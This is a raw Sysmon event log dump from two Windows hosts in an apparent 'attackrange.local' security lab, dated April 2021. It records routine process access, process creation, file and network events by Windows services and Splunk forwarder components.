17:30:12.355{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2900-00000000BA01}2920C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061032Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.355{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2900-00000000BA01}2920C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061031Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.173{761B69BB-6124-6080-955C-00000000BA01}66126320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061030Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.044{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061029Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.044{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061028Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.036{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-6124-6080-955C-00000000BA01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061027Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.034{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061026Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.034{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061025Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.034{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061024Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.034{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061023Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.034{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-6124-6080-955C-00000000BA01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061022Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.033{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-6124-6080-955C-00000000BA01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061021Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.033{761B69BB-6124-6080-955C-00000000BA01}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061020Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.004{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3BF2F5F0C2BE0249D66834349CAEF57,SHA256=99E79ECAED55A29EEEE1FC3A5F4ED9A9D91FEDD2BF21F403D52E5A50A9019D81,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001530386Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.763{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64681-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001530385Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:13.211{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530384Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:13.211{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE6003FD1B8C3869F44B4EB544227BB5,SHA256=6772B220AE80A751713AB1B9DE329CF578EB2E26D4F398D66D26D5155DDCED51falsefalse - insufficient disk space 354300x80000000000000001061094Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.825{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1295-false10.0.1.12-8000- 10341000x80000000000000001061093Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.211{761B69BB-6125-6080-975C-00000000BA01}8724216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061092Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.070{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-6125-6080-975C-00000000BA01}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061091Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.069{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061090Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.069{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061089Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.069{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061088Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.069{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061087Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.069{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-6125-6080-975C-00000000BA01}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061086Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.069{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-6125-6080-975C-00000000BA01}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061085Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.068{761B69BB-6125-6080-975C-00000000BA01}872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061084Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061083Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061082Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.036{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50CF3ECB9A4EFAA590269D2CD3F5A6FD,SHA256=C0DE7A0B0CB854D7C7D798538DCA09FDE64CB3C904C9C8C3AE6C42B9F24B87F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061081Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:13.013{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A834C97D1231C540318AC78E27F0E2A,SHA256=9A08A8579A1BEBA435A74830AF7F0413CC2F551E287DA87D560DDDCD5D8976EC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530388Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:13.997{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530387Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:13.997{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978CDB950D595ED58D5666D6E58531B2,SHA256=B681A45638C7CBE7254FF062211E8644B223471D7A8F83C96716139693850A1Cfalsefalse - insufficient disk space 23542300x80000000000000001061098Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.252{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBD917129B62810D61DB79CE0EB240D9,SHA256=056F31D68A99AF6C42A9C1A7EB4469CA807047224E9C8EA1EF2F05345C6E1180,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061097Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.045{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061096Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 